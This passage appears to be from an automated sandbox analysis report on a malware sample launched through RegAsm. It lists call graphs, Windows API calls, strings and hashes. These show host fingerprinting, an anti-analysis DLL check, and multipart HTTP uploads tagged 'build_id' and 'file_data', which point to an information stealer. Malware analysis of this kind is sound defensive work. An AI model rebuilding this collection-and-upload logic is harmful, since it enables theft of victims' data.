5 API calls 22555 405480 22554->22555 22555->21787 22556->22554 22772 407eee 22557->22772 22559 40ec9e 22775 40e186 22559->22775 22561 40ecb0 22794 40e6cf 22561->22794 22563 40ee88 22563->21789 22568 40ead3 22568->22559 22808 40c77a 67 API calls 22568->22808 22809 40c95c 68 API calls 22568->22809 22810 40d9aa 64 API calls 22568->22810 22570 40ecbc 22570->22563 22811 40c77a 67 API calls 22570->22811 22812 40c95c 68 API calls 22570->22812 22813 40d9aa 64 API calls 22570->22813 22573 4139ac 22572->22573 22578 413640 22572->22578 22574 41d016 setSBUpLow 5 API calls 22573->22574 22575 4139c0 22574->22575 22575->21803 22576 41397f strtok_s 22576->22573 22576->22578 22577 411dbc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22577->22578 22578->22576 22578->22577 22580 4153e9 22579->22580 22581 4153a8 22579->22581 22580->21812 22581->22580 22825 415142 63 API calls 2 library calls 22581->22825 22583->21833 22585 41829b _memset 22584->22585 22586 41d016 setSBUpLow 5 API calls 22585->22586 22587 4184a9 22586->22587 22587->21835 22588->21799 22589->21790 22590->21804 22591->21791 22592->21816 22593->21814 22594->21815 22595->21819 22596->21820 22597->21824 22598->21830 22599->21825 22600->21842 22602 4054bc 22601->22602 22603 404ab6 4 API calls 22602->22603 22605 4054d5 22603->22605 22604 411c4a 5 API calls 22608 4055cc _memmove 22604->22608 22605->22604 22610 405d75 22605->22610 22606 41d016 setSBUpLow 5 API calls 22607 405f2d 22606->22607 22612 413198 strtok_s strtok_s 22607->22612 22609 405d20 HttpSendRequestA 22608->22609 22608->22610 22609->22610 22610->22606 22611 405f2f 22610->22611 22612->21846 22613->21848 22614->22439 22616 41d016 setSBUpLow 5 API calls 22615->22616 22617 412601 22616->22617 22617->21810 22617->21811 22619 41173c 22618->22619 22620 4116ad _memset 22618->22620 22621 41d016 setSBUpLow 5 API calls 22619->22621 22626 4123d5 malloc strncpy 22620->22626 22622 411755 22621->22622 22622->22460 22624 4116ea 22624->22619 22625->22462 22626->22624 22628 404ac4 22627->22628 22628->22628 22629 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 22628->22629 22630 404b0c InternetCrackUrlA 22629->22630 22631 404b27 22630->22631 22631->22466 22633 410cde RtlAllocateHeap 22632->22633 22634 410cf1 22633->22634 22635 41d016 setSBUpLow 5 API calls 22634->22635 22636 410d2c 22635->22636 22636->22506 22744 423c10 22637->22744 22640 411651 CharToOemA 22643 41d016 setSBUpLow 5 API calls 22640->22643 22641 411630 RegQueryValueExA 22641->22640 22644 411682 22643->22644 22644->22508 22646 412272 22645->22646 22647 412294 22646->22647 22648 412278 K32GetModuleFileNameExA 22646->22648 22649 41d016 setSBUpLow 5 API calls 22647->22649 22648->22647 22650 4122ae 22649->22650 22650->22514 22652 410b4a 22651->22652 22746 410c16 22652->22746 22655 410b63 RegOpenKeyExA 22656 410b83 RegQueryValueExA 22655->22656 22657 410b5c 22655->22657 22656->22657 22657->22516 22754 42f109 22658->22754 22660 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 22661 41186b 22660->22661 22662 411873 CoSetProxyBlanket 22661->22662 22663 411964 22661->22663 22665 4118a3 22662->22665 22664 42f165 5 API calls 22663->22664 22666 411996 22664->22666 22665->22663 22667 4118d7 VariantInit 22665->22667 22666->22518 22668 4118f6 22667->22668 22755 411757 22668->22755 22670 411901 FileTimeToSystemTime 22671 41191c 22670->22671 22672 411958 VariantClear 22671->22672 22672->22663 22764 42f09d 22673->22764 22675 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 22676 4119f9 22675->22676 22677 411a01 CoSetProxyBlanket 22676->22677 22679 411a93 22676->22679 22678 411a31 22677->22678 22678->22679 22680 411a59 VariantInit 22678->22680 22679->22520 22681 411a78 22680->22681 22682 411a87 VariantClear 22681->22682 22682->22679 22683->22524 22689 410e02 22684->22689 22685 410eed 22687 41d016 setSBUpLow 5 API calls 22685->22687 22686 410e42 GetLocaleInfoA 22686->22689 22688 410f15 22687->22688 22688->22526 22689->22685 22689->22686 22691 410d4f GetTimeZoneInformation 22690->22691 22693 410d6a 22691->22693 22694 41d016 setSBUpLow 5 API calls 22693->22694 22695 410d93 22694->22695 22695->22530 22697 410f6b RegOpenKeyExA 22696->22697 22699 410f94 RegQueryValueExA 22697->22699 22700 410fac 22697->22700 22699->22700 22700->22532 22702 411048 22701->22702 22703 41d016 setSBUpLow 5 API calls 22702->22703 22704 411117 22703->22704 22704->22534 22706 410ff2 22705->22706 22707 41d016 setSBUpLow 5 API calls 22706->22707 22708 411005 22707->22708 22708->22536 22710 411137 22709->22710 22711 41114d GlobalMemoryStatusEx 22710->22711 22712 41115f 22711->22712 22713 41d016 setSBUpLow 5 API calls 22712->22713 22714 411190 22713->22714 22714->22538 22716 4111b3 22715->22716 22717 41d016 setSBUpLow 5 API calls 22716->22717 22718 411201 22717->22718 22718->22540 22765 4104e7 22719->22765 22721 4114c6 CreateToolhelp32Snapshot Process32First 22722 41154c 22721->22722 22725 4114ee 22721->22725 22724 41d016 setSBUpLow 5 API calls 22722->22724 22723 41153a Process32Next 22723->22722 22723->22725 22726 411561 22724->22726 22725->22723 22726->22542 22728 4104e7 22727->22728 22729 41123b RegOpenKeyExA 22728->22729 22731 41145e 22729->22731 22737 411281 22729->22737 22730 411287 RegEnumKeyExA 22730->22737 22733 41d016 setSBUpLow 5 API calls 22731->22733 22732 4112e3 RegOpenKeyExA 22732->22731 22734 41130a RegQueryValueExA 22732->22734 22735 4114a3 22733->22735 22734->22737 22735->22544 22736 4113b0 RegQueryValueExA 22736->22737 22737->22730 22737->22731 22737->22732 22737->22736 22740 416ea7 22738->22740 22739 416f29 CreateThread WaitForSingleObject 22743 416f51 22739->22743 22768 416dc6 22739->22768 22740->22739 22767 41ccc8 51 API calls 22740->22767 22742 416f27 22742->22739 22743->22548 22745 41160c RegOpenKeyExA 22744->22745 22745->22640 22745->22641 22749 410ba9 22746->22749 22748 410b58 22748->22655 22748->22657 22750 410bc3 RegOpenKeyExA 22749->22750 22752 410bec RegQueryValueExA 22750->22752 22753 410c03 22750->22753 22752->22753 22753->22748 22754->22660 22763 42f09d 22755->22763 22757 411763 CoCreateInstance 22758 41178b SysAllocString 22757->22758 22759 4117e7 22757->22759 22758->22759 22761 41179a 22758->22761 22759->22670 22760 4117e0 SysFreeString 22760->22759 22761->22760 22762 4117be _wtoi64 SysFreeString 22761->22762 22762->22760 22763->22757 22764->22675 22766 4104f2 22765->22766 22766->22721 22767->22742 22770 416dd2 __EH_prolog3_catch 22768->22770 22769 405482 10 API calls 22769->22770 22770->22769 22771 416de3 22770->22771 22814 407eae malloc 22772->22814 22774 407efc 22774->22568 22776 40e1bc _memset 22775->22776 22777 40e1fe RegOpenKeyExA 22776->22777 22778 40e237 RegGetValueA 22777->22778 22779 40e6b8 22777->22779 22780 40e264 22778->22780 22784 40e287 22778->22784 22782 41d016 setSBUpLow 5 API calls 22779->22782 22780->22779 22781 40e2a9 RegOpenKeyExA 22781->22779 22791 40e2c7 22781->22791 22783 40e6cd 22782->22783 22783->22561 22784->22780 22784->22781 22785 40e356 RegGetValueA 22785->22791 22786 40e3a9 RegGetValueA 22786->22791 22788 40e485 RegGetValueA 22788->22791 22789 40e504 RegGetValueA 22789->22791 22791->22780 22791->22785 22791->22786 22791->22788 22791->22789 22792 40e63c 22791->22792 22815 412406 5 API calls setSBUpLow 22791->22815 22816 40dca0 106 API calls setSBUpLow 22791->22816 22793 416e97 58 API calls 22792->22793 22793->22780 22795 40e6e8 22794->22795 22817 411dbc 22795->22817 22797 40e6f9 22805 40ea60 22797->22805 22821 411e1f 22797->22821 22800 40e775 strtok_s 22807 40e796 22800->22807 22801 40ea2d 22802 416e97 58 API calls 22801->22802 22802->22805 22803 4123d5 malloc strncpy 22806 40e7e9 22803->22806 22804 40ea10 strtok_s 22804->22807 22805->22570 22806->22803 22806->22807 22807->22801 22807->22804 22807->22806 22808->22568 22809->22568 22810->22568 22811->22570 22812->22570 22813->22570 22814->22774 22815->22791 22816->22791 22818 411e03 22817->22818 22819 41d016 setSBUpLow 5 API calls 22818->22819 22820 411e1d 22819->22820 22820->22797 22822 40e76c 22821->22822 22823 411e2d 22821->22823 22822->22800 22822->22805 22823->22822 22824 411e31 LocalAlloc 22823->22824 22824->22822 22825->22581 22827 41cbd0 22826->22827 22828 41cbde 22826->22828 22846 41bb6c lstrlenA malloc lstrcpyA 22827->22846 22835 41bc21 22828->22835 22830 41cbda 22830->22828 22833 41cc04 malloc 22834 41cbf7 22833->22834 22834->21851 22836 41bc30 22835->22836 22843 41bc89 22835->22843 22837 41bc90 22836->22837 22838 41bc63 SetFilePointer 22836->22838 22836->22843 22839 41bc96 CreateFileA 22837->22839 22841 41bccb 22837->22841 22838->22843 22840 41bcb4 22839->22840 22840->22843 22842 41bcef CreateFileMappingA 22841->22842 22841->22843 22842->22843 22844 41bd0b MapViewOfFile 22842->22844 22843->22833 22843->22834 22844->22843 22845 41bd21 CloseHandle 22844->22845 22845->22843 22846->22830

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 996 411807-41186d call 42f109 CoInitializeEx CoInitializeSecurity CoCreateInstance 1000 411971-411976 996->1000 1001 411873-4118a5 CoSetProxyBlanket 996->1001 1002 41198a call 4104e7 1000->1002 1005 4118ab-4118b6 1001->1005 1006 41196a-41196f 1001->1006 1007 41198f-411996 call 42f165 1002->1007 1009 411964-411985 1005->1009 1010 4118bc-4118d1 1005->1010 1006->1002 1009->1002 1010->1009 1014 4118d7-4118fc VariantInit call 411757 1010->1014 1017 411901-411962 FileTimeToSystemTime call 4104e7 VariantClear 1014->1017 1017->1007
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                  • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                  • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                  • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                  • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                  • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                  • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String$CreateFreeInitializeInstanceTimeVariant$AllocBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProxySecuritySystem_wtoi64
                                                                • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                • API String ID: 2027821108-461178377
                                                                • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2299 406963-4069e7 call 410519 call 404ab6 call 4104e7 InternetOpenA 2307 4069e9 2299->2307 2308 4069ea-4069f0 2299->2308 2307->2308 2309 4069f6-406a1c InternetConnectA 2308->2309 2310 406b6e-406b7a call 410519 2308->2310 2311 406b62 2309->2311 2312 406a22-406a5d HttpOpenRequestA 2309->2312 2316 406b7f-406baa call 402920 * 3 call 41d016 2310->2316 2311->2310 2314 406a63-406a65 2312->2314 2315 406b56 2312->2315 2318 406a83-406ab4 HttpSendRequestA 2314->2318 2319 406a67-406a7c 2314->2319 2315->2311 2324 406ab6 2318->2324 2325 406acb-406adb call 411afd 2318->2325 2319->2318 2327 406abb-406ac6 call 4104e7 2324->2327 2334 406ae1-406ae3 2325->2334 2335 406bab-406bb0 2325->2335 2327->2316 2337 406ae5-406aea 2334->2337 2338 406b4a-406b50 InternetCloseHandle 2334->2338 2335->2327 2339 406b2b-406b48 InternetReadFile 2337->2339 2338->2315 2339->2338 2340 406aec-406af4 2339->2340 2340->2338 2341 406af6-406b26 call 410609 call 41058d call 402920 2340->2341 2341->2339
                                                                APIs
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                  • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00436997), ref: 004069C5
                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$HttpOpenRequest$CloseConnectCrackFileHandleReadSend
                                                                • String ID: ERROR$ERROR$GET
                                                                • API String ID: 3281277790-2509457195
                                                                • Opcode ID: 4ec13abdfe32b591f6d3eedb5c933f1c527e1304724b0b24799dd44745f4032a
                                                                • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                • Opcode Fuzzy Hash: 4ec13abdfe32b591f6d3eedb5c933f1c527e1304724b0b24799dd44745f4032a
                                                                • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                APIs
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreatePointer
                                                                • String ID:
                                                                • API String ID: 2024441833-0
                                                                • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(?,00000000,00436712,?,?), ref: 004114D4
                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1238713047-0
                                                                • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocNameProcessUser
                                                                • String ID:
                                                                • API String ID: 1206570057-0
                                                                • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000200,00000000), ref: 00410E57
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: /
                                                                • API String ID: 2299586839-4001269591
                                                                • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 565725191-0
                                                                • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcmpi
                                                                • String ID:
                                                                • API String ID: 1586166983-0
                                                                • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d * 2 call 4104e7 * 4 21 405595 0->21 22 40559b-4055a1 0->22 21->22 23 4055a3-4055b8 22->23 24 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 22->24 23->24 29 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 23->29 24->29 93 4056d4-405712 24->93 63 405eee-405f2e call 402920 * 6 call 41d016 29->63 95 405e58 93->95 96 405718-40571e 93->96 95->29 97 405720-405735 96->97 98 40573c-405d65 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 427050 * 3 HttpSendRequestA 96->98 97->98 294 405d75-405d77 98->294 295 405db5-405dc5 call 411afd 294->295 296 405d79-405db0 call 4104e7 call 402920 * 3 294->296 301 405dcb-405dd0 295->301 302 405f2f 295->302 296->63 304 405e11-405e2e 301->304 309 405e30-405e43 304->309 310 405dd2-405dda 304->310 316 405e45 309->316 317 405e4c 309->317 310->309 313 405ddc-405e0c call 410609 call 41058d call 402920 310->313 313->304 316->317 317->95
                                                                APIs
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                  • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                • _memmove.LIBCMT ref: 00405CB4
                                                                • _memmove.LIBCMT ref: 00405CD6
                                                                • _memmove.LIBCMT ref: 00405D05
                                                                • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memmove$CrackHttpInternetRequestSend
                                                                • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b26735cbe8ca9e75712ffe3aa40c4a60$block$build_id$file_data
                                                                • API String ID: 4955943-3708530033
                                                                • Opcode ID: a9f9a16d7ed9cb6f6dffaab1b80b3fa30c09e432f7c44dde5ace5f3de2395ab5
                                                                • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                • Opcode Fuzzy Hash: a9f9a16d7ed9cb6f6dffaab1b80b3fa30c09e432f7c44dde5ace5f3de2395ab5
                                                                • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

                                                                Control-flow Graph

                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                • wsprintfW.USER32 ref: 004016BC
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,?,00000100,00000000), ref: 004016E6
                                                                • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                • _time64.MSVCRT ref: 0040170E
                                                                • srand.MSVCRT ref: 00401715
                                                                • rand.MSVCRT ref: 0040171E
                                                                • _memset.LIBCMT ref: 0040172E
                                                                • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                • _memset.LIBCMT ref: 00401763
                                                                • CloseHandle.KERNEL32(?), ref: 00401771
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                • _memset.LIBCMT ref: 004017BE
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                • String ID: %s%s$delays.tmp
                                                                • API String ID: 1620473967-1413376734
                                                                • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
